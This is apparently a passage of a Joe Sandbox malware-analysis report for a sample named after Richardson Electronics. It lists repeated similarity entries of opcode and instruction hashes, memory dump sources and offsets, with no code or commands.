                                                              • Instruction ID: 32911894b1f537039d3a5f551cc364d5ab89e79608c5f94b0b375a183fe85621
                                                              • Opcode Fuzzy Hash: 3dcd9923455feb48d517a125c44f7408860cc234f614cabdc7547779779ae4f5
                                                              • Instruction Fuzzy Hash: CC415430B506158FDB94EB65C854AAE7BB7AFC8700F108529F507AB394CF749C46CB91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8dae7b7eba0b689f89d1d6868acd9185f1a01b73ebe4ae6ec1eb03aa6bf93264
                                                              • Instruction ID: 085be123ac59fcde9bc1e44383b51dd353cb9e00363115c0f2e124dcc5efcfcf
                                                              • Opcode Fuzzy Hash: 8dae7b7eba0b689f89d1d6868acd9185f1a01b73ebe4ae6ec1eb03aa6bf93264
                                                              • Instruction Fuzzy Hash: 40510474D56308CFEB90DFA9D584BADBBF2BB4A700F20A269E409A7344D7715985CF04
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2177141556.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12c0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 75bc647b536c5ba360133e2de1095d4f8469a83186078e8204b0985819014d44
                                                              • Instruction ID: 4a7ca7bd4dedfeab7457c2912a2e0303f2f6523aa306591af7a4fac2147215ad
                                                              • Opcode Fuzzy Hash: 75bc647b536c5ba360133e2de1095d4f8469a83186078e8204b0985819014d44
                                                              • Instruction Fuzzy Hash: B951DDB4D10208DFDB04DFAAD5496ADBBF2BF88300F10912AEA16A7290DB746985CF40
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a9b3f96a84aa77aabf760975d50aaa331b5270c607ba540a1946a685d83229a6
                                                              • Instruction ID: d8c5cb22833a774ecd5a039673b940b2921595a3d6f7dd3e23b3c5a4c627775d
                                                              • Opcode Fuzzy Hash: a9b3f96a84aa77aabf760975d50aaa331b5270c607ba540a1946a685d83229a6
                                                              • Instruction Fuzzy Hash: D3511574D56208CFDB90DFA9D980BADBBF2BB4A300F209269E409A7344D7715D85CF04
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5249de0c34463aba5bee391fd23b8e2c9442016b82f834aed042671dfe78571f
                                                              • Instruction ID: ae1f5aaa8384d615dcc85e0991c0ad9682928251ea1a2ceca7c331175c952f88
                                                              • Opcode Fuzzy Hash: 5249de0c34463aba5bee391fd23b8e2c9442016b82f834aed042671dfe78571f
                                                              • Instruction Fuzzy Hash: 8751F1B4E11208DFDB58DFB9D594A9DBBF2BF88304F20812AE405AB361DB359981CF50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1eaab1d73eb3afa43fb5cc9d06800457a2fb4232bc0d6a367e8b6a0b134abd70
                                                              • Instruction ID: 61b0f61d07bc151087fbcc9d60c1554a358f3f3187ef007c39cd7142d920decf
                                                              • Opcode Fuzzy Hash: 1eaab1d73eb3afa43fb5cc9d06800457a2fb4232bc0d6a367e8b6a0b134abd70
                                                              • Instruction Fuzzy Hash: F6418D34B80209CFDB94DB69C854B6ABBF2EF88310F108529E9079B390DB71E845CB90
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2177141556.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12c0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1a0675479a02876f535589717c7faba861c28295dabca6c2c150ec2eb155d84a
                                                              • Instruction ID: ecb2f0b7a90e869e21483a0df06a2a91183ed4bc1edfb703fc3d76c43c42f0c5
                                                              • Opcode Fuzzy Hash: 1a0675479a02876f535589717c7faba861c28295dabca6c2c150ec2eb155d84a
                                                              • Instruction Fuzzy Hash: 5D418C70E10219CFDB18EFB8D4556EEBBF2AF89610F548169D506EB381DB349D05CB90
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a1da55cf0c84c2551a4d2aae7306ba1d42329ca1c93be76fd2623fc544fbdcca
                                                              • Instruction ID: 3f49de68644164604969701a0ffd2551086f7b26829df2a5db1e50c85748b312
                                                              • Opcode Fuzzy Hash: a1da55cf0c84c2551a4d2aae7306ba1d42329ca1c93be76fd2623fc544fbdcca
                                                              • Instruction Fuzzy Hash: 55313235A402189FDF54DFA5D858AEEBBB5FF88310F108065E905BB3A4CB719D45CBA0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8e0493f4b4d05e9472b9768014275e30aba2aba4d60b2facaed7391db37392c6
                                                              • Instruction ID: ea2d989ba6f16cf0e4b00fae6c1650ec050853aa9c7ca60815deb03fcdb7c87c
                                                              • Opcode Fuzzy Hash: 8e0493f4b4d05e9472b9768014275e30aba2aba4d60b2facaed7391db37392c6
                                                              • Instruction Fuzzy Hash: BF31F576A50108DFCB49DF99D888E99BBB2FF49320B1640A8F5099B372CB31ED55CB40
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 38a00b8e49c7efacac3525d9c286ec1fbc4ebe924f2ee98a391bf671c7fab954
                                                              • Instruction ID: c699e08526075dec291697175239c094c22aa92aec129d621fa7cbb2fbac7da3
                                                              • Opcode Fuzzy Hash: 38a00b8e49c7efacac3525d9c286ec1fbc4ebe924f2ee98a391bf671c7fab954
                                                              • Instruction Fuzzy Hash: A1312470A056519FCB55DF2EE8849AAFFB5FF80310F41C16AE44687642C770E895C7E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 512f9ac9612217934c1d202d06da6b44f5efc311824b7abcf3319b29c4003cf8
                                                              • Instruction ID: 509eca2805a21cb61ea8e9f21b5d1e9ffab27d2b1f9048a8344dc81e53563d79
                                                              • Opcode Fuzzy Hash: 512f9ac9612217934c1d202d06da6b44f5efc311824b7abcf3319b29c4003cf8
                                                              • Instruction Fuzzy Hash: AD418F71E8022A8FDB94DF66C944AAFBBF1FF88301F008429E556E7291E734D945CB90
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ed253498b6b2dd406d5a28e8929a30244ffe26e43a7c47d40d0fdba8286913dc
                                                              • Instruction ID: b6abf2434c3f0b70bffa2da50497b95b6e916b02367fce1bc6f2fc61b614b0c2
                                                              • Opcode Fuzzy Hash: ed253498b6b2dd406d5a28e8929a30244ffe26e43a7c47d40d0fdba8286913dc
                                                              • Instruction Fuzzy Hash: FA31D334A497868FC742EF75D8508EEBFB5AF87200B00419BE541DB262DA345E4AC7E2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5061baeeb257923672e7086a781d131cf8db9bc38faf77405ca6dcfaf1ae6f6d
                                                              • Instruction ID: 908c3a1c96a9a63504ec03bb69ea08f0329c3246e3e01cc7a23fb3eda4e742fd
                                                              • Opcode Fuzzy Hash: 5061baeeb257923672e7086a781d131cf8db9bc38faf77405ca6dcfaf1ae6f6d
                                                              • Instruction Fuzzy Hash: D0219E36740104EFCB58DFA4D85499DBFB6FF8C720B0580A9EA059B361DA31EC56CBA1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b991439e3507346a9c22fe7f26749e80c838d7e85538c9477a6d343ab30d19b2
                                                              • Instruction ID: 6e27cc796b8fea6849c24698143a8cb3a83f9332774731f97be9b8843b3e7328
                                                              • Opcode Fuzzy Hash: b991439e3507346a9c22fe7f26749e80c838d7e85538c9477a6d343ab30d19b2
                                                              • Instruction Fuzzy Hash: C3317A34741305CFC769EF25D85496ABBB6FF85301710886DE9428B3A1CB39EC4ACB90
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7f0aba88c8851971e45445767f1c66108ad77464d39264f28f3f2dca5fc97edc
                                                              • Instruction ID: 2dfaf82d22782bd07caa37aba5a5aa147a9bfa21b46cf645ff3da626786d7ff3
                                                              • Opcode Fuzzy Hash: 7f0aba88c8851971e45445767f1c66108ad77464d39264f28f3f2dca5fc97edc
                                                              • Instruction Fuzzy Hash: 78313274E14209DFDB84DFAAD444AAEBBF2FF89300F108129D509A7354DB755981CF90
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a120b51b4327d5efebd7e81c48a9c5faeb0b8a65501804a7eb3379dc9143be41
                                                              • Instruction ID: cf5557eb48ef46f4b01bff077431b13cedf786ba55b76ef6cfbe6b09f84aea4b
                                                              • Opcode Fuzzy Hash: a120b51b4327d5efebd7e81c48a9c5faeb0b8a65501804a7eb3379dc9143be41
                                                              • Instruction Fuzzy Hash: 97219330B902159BDB94AB66D858AAEBFABAFC4600F10441AF106EB794CF745C46C7D1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 36d39fe4d01109fdf25815ecad63924c582e606bed7a841c59c51cbdc7f3957b
                                                              • Instruction ID: aba8ca715e597a72a6728f3c6c1d88c92d20623f9c9c8e10a3ed71cb7ba6a7e1
                                                              • Opcode Fuzzy Hash: 36d39fe4d01109fdf25815ecad63924c582e606bed7a841c59c51cbdc7f3957b
                                                              • Instruction Fuzzy Hash: C9313574E50209CFDB84CFA9D444AEEBBF2BF89310F048169D514A73A4D7729981CF90
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c1e80ce65a6c96263456795e5ff996a9485605d86171c3f1d5870008352614d1
                                                              • Instruction ID: 562f5b3ae8fcbb49cd94a733c380d8fd834783f7b3b5f414791a6f203f842066
                                                              • Opcode Fuzzy Hash: c1e80ce65a6c96263456795e5ff996a9485605d86171c3f1d5870008352614d1
                                                              • Instruction Fuzzy Hash: FA21F4313452018FC7A48B6BF944AA6BFDAEFC1321B05847AE54DC7941DA31E846C790
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 327961af1476f35a72adeee2aca1cf41e1f9af3e09019b8e815ad5b2989dd97e
                                                              • Instruction ID: e9fc0964192ec75a2a009163a1091571ed1a6237be0bdea22b64371866db8faa
                                                              • Opcode Fuzzy Hash: 327961af1476f35a72adeee2aca1cf41e1f9af3e09019b8e815ad5b2989dd97e
                                                              • Instruction Fuzzy Hash: 60218D35B40104DFCB58DFA4C85495DBFB6FF8C720B0580A9EA069B361DA71EC52CB91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201487274.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6050000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9da5b6c9349a33cc3b958d887776e197c2ba3f6a55dc6bad858f5d7cbd8629aa
                                                              • Instruction ID: 7a29bb866e4bc097a23246e631721c3dc588707854d66fa0e8d599dd61c579cc
                                                              • Opcode Fuzzy Hash: 9da5b6c9349a33cc3b958d887776e197c2ba3f6a55dc6bad858f5d7cbd8629aa
                                                              • Instruction Fuzzy Hash: B0318E70D44209CFDB99CFA5C4087AFBFB1EB44300F0280AAD812A7291D7385A85CFA1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 62e94d606d7c408f4d9e4a0df0f331c63a39473d1876d32d999bedad846f5837
                                                              • Instruction ID: 568d3dd76abe0c5cc07b97a91a9cdbde3b2e4f98fa0788625b39815d3226ec7c
                                                              • Opcode Fuzzy Hash: 62e94d606d7c408f4d9e4a0df0f331c63a39473d1876d32d999bedad846f5837
                                                              • Instruction Fuzzy Hash: 15212770D89389EFC794DFA8C8046ADBFF5AF46200F0482E9D40E97291EB319D41CB81
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2177141556.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12c0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f78a9b2a46059b5cbc171cdaa28bab77986ac9d21ee0ff22c9e509cebb6fa547
                                                              • Instruction ID: f20adac35bacdd3becddcf6a1bcb9544e71c227b1734d599e7173a4d92b5de9a
                                                              • Opcode Fuzzy Hash: f78a9b2a46059b5cbc171cdaa28bab77986ac9d21ee0ff22c9e509cebb6fa547
                                                              • Instruction Fuzzy Hash: 0D315674D25609DFD701EFA8C0487AEBBF2FF06704F2081AAD205A7391D7B94A88CB51
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 383b19babcd15a0e1989284f6abb195ca2466f8ead8abcd29d3462eeaa845686
                                                              • Instruction ID: 9291bdf6e93c32a5def6d4112ea8960bf20e03e6cb34b4eb5786b5f5963022ce
                                                              • Opcode Fuzzy Hash: 383b19babcd15a0e1989284f6abb195ca2466f8ead8abcd29d3462eeaa845686
                                                              • Instruction Fuzzy Hash: 1A218874B1060ACFCB44EF69D4945AEBBF6FF89700B104129E51697364EF70AA06CBD1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c206a93a5ad42cdb452d000b9d7274cb8f90d5800c148c0e8cbef2285c00ccbe
                                                              • Instruction ID: 050769147239de7bda909c853f085a6f18e1b56cc43db3c2bcb2faac6bf89bc3
                                                              • Opcode Fuzzy Hash: c206a93a5ad42cdb452d000b9d7274cb8f90d5800c148c0e8cbef2285c00ccbe
                                                              • Instruction Fuzzy Hash: 3E219D317402449FCB96CF2AC840AAA7FEAEF8A250B054096F845CB361CA31DC41CBB0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2177141556.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12c0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0235eaf67968038e0128c08b33f196b1d41daa556f64e159fa26e7ad88692125
                                                              • Instruction ID: 5a6658f435c3c99b8d12a6bc611e13b905a00dbe1271ad2f3d22326ba648e024
                                                              • Opcode Fuzzy Hash: 0235eaf67968038e0128c08b33f196b1d41daa556f64e159fa26e7ad88692125
                                                              • Instruction Fuzzy Hash: 8C212A74D1521DCFDB04DFAAD4097EEBBB5FB89304F008629D615A3384EB7449858F91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c989aea266d80509ddd5b2c0badefc21e9eefc50946825b873fded8a72d21b57
                                                              • Instruction ID: 99837f6c06b22eb4387f471e366ecac304879b9da6588de7e01d9432f40552a5
                                                              • Opcode Fuzzy Hash: c989aea266d80509ddd5b2c0badefc21e9eefc50946825b873fded8a72d21b57
                                                              • Instruction Fuzzy Hash: FD214A31E40209DFDB90DBBAC904BAEBBF5AF44340F508076E515DB290E634CB50CB91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2176926582.000000000127D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0127D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_127d000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7cb02e10c873f21e4cd4ef546f4608e0bb71cc40751ce03d0dcaf422d021bb3a
                                                              • Instruction ID: 7f6738ec5e096113587d05aa7936b7a50454b32fb858a24be795102499196dcc
                                                              • Opcode Fuzzy Hash: 7cb02e10c873f21e4cd4ef546f4608e0bb71cc40751ce03d0dcaf422d021bb3a
                                                              • Instruction Fuzzy Hash: E8215A710093C49FCB03DF64D990716BF71AF46214F2981DBD9848F2A7C33A981ACBA2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2176926582.000000000127D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0127D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_127d000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ec1ac22fbfb54dfe335614135fbd7f8d0f1988f2441238467318ed9490e308fb
                                                              • Instruction ID: 6a8217ebc094b97b40879b782b33be4bb3435b32b3076a4f4d1a5807d44853c5
                                                              • Opcode Fuzzy Hash: ec1ac22fbfb54dfe335614135fbd7f8d0f1988f2441238467318ed9490e308fb
                                                              • Instruction Fuzzy Hash: E7212572514248DFDB16DF54D9C0B27BF65FF84314F20C169DA090B246C376D816CAA2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2177141556.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12c0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3e365fab458b6ecc6578802fd706cb06b1018b292013b4d90c896c37c511c4bf
                                                              • Instruction ID: 95e13931d8771fe6879c45712a2975460ef3773da92b0d0b051fe83d19c76c9b
                                                              • Opcode Fuzzy Hash: 3e365fab458b6ecc6578802fd706cb06b1018b292013b4d90c896c37c511c4bf
                                                              • Instruction Fuzzy Hash: 76314D74D25609DFD700EFA8D0487AEBBF6FB45704F608169D205A7390D7B94A88CF51
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2d5af0744779e7e78cf24bad74c4079cc75e45e4aea406feba67c1a5b6da5027
                                                              • Instruction ID: c495d6fbf4dbf8fec4e7c4afbd9311e0608c288882a09bfe8de43c7809291ab5
                                                              • Opcode Fuzzy Hash: 2d5af0744779e7e78cf24bad74c4079cc75e45e4aea406feba67c1a5b6da5027
                                                              • Instruction Fuzzy Hash: D131B270984219CFEBA6CF29DC98BEDBBB2BB49300F5442E5980DA7254DB715AC0CF40
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 70ceec72d2d8b06c9dd4fd874ec0b5c17cc73b4b7ff338f198b6b6eeed1c4288
                                                              • Instruction ID: daadfa236c04635279b1911a1b358a084482eef052296395af4e181dafc13ecd
                                                              • Opcode Fuzzy Hash: 70ceec72d2d8b06c9dd4fd874ec0b5c17cc73b4b7ff338f198b6b6eeed1c4288
                                                              • Instruction Fuzzy Hash: 3F216A303401489FCB89CF2AC840AAA7FEAEF8A214B0440A6FC45CB361CB71DC50DB60
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2177141556.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_12c0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 55aa775de5fabcf4cfb28b998caa8d8a1359818e223f543f24e5c2c2ca3109aa
                                                              • Instruction ID: 37aeeb78cd5b0c5ffc2e08137c99e3906a4bbcf8d92e9b2d6603a6e12de38957
                                                              • Opcode Fuzzy Hash: 55aa775de5fabcf4cfb28b998caa8d8a1359818e223f543f24e5c2c2ca3109aa
                                                              • Instruction Fuzzy Hash: 2B21DC30B203468FDB608E2C8811B6ABBE9AF84A40F35462EDB81EB351C674C841CB91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7213691f4ce7aa99b56dcb6e83529b7922798a52900f8ca1bc2803684ba9b6d4
                                                              • Instruction ID: e14f266c0a784706f69042b04cda9fbb99000c58538d197f7e973ef2a31efa99
                                                              • Opcode Fuzzy Hash: 7213691f4ce7aa99b56dcb6e83529b7922798a52900f8ca1bc2803684ba9b6d4
                                                              • Instruction Fuzzy Hash: 95210831A40219CFDB48DF59C544ADDBBF2FB88304F2041A5E505BB2A1CB769D45CBA0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b278b4512b8c41ef8affa4cf62a9075455fa5c477ba767428a558dabe139f914
                                                              • Instruction ID: 05955b305c13efa2be9abc9bb274574ccdd48b3d1cba5300e8742c0a9a7e5e50
                                                              • Opcode Fuzzy Hash: b278b4512b8c41ef8affa4cf62a9075455fa5c477ba767428a558dabe139f914
                                                              • Instruction Fuzzy Hash: B1213674E2020ECFDB94DFA9D4446AEBBF6BF88300F2481A9D915A7744D7369981CF80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 931dab29c3953782df39dc866609e60d4aa24c72266ee912bd5b7b434f6c42db
                                                              • Instruction ID: d24a18cd712cd1f74f8b4b5c502a7741d4b84d0a16b9977894f40649aa2928b7
                                                              • Opcode Fuzzy Hash: 931dab29c3953782df39dc866609e60d4aa24c72266ee912bd5b7b434f6c42db
                                                              • Instruction Fuzzy Hash: 2B21D230B102058FC755EF69D8849AEBBF6FF89300F14456AF90297365DB30AD05CBA1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 09e968939a47a8688305a6472ba29c73730c7829717bcdf374218c1995e27971
                                                              • Instruction ID: 0fb2ba12c7217a4d21206581e5bc57faaf6152ec455638027d9d9f3109580b11
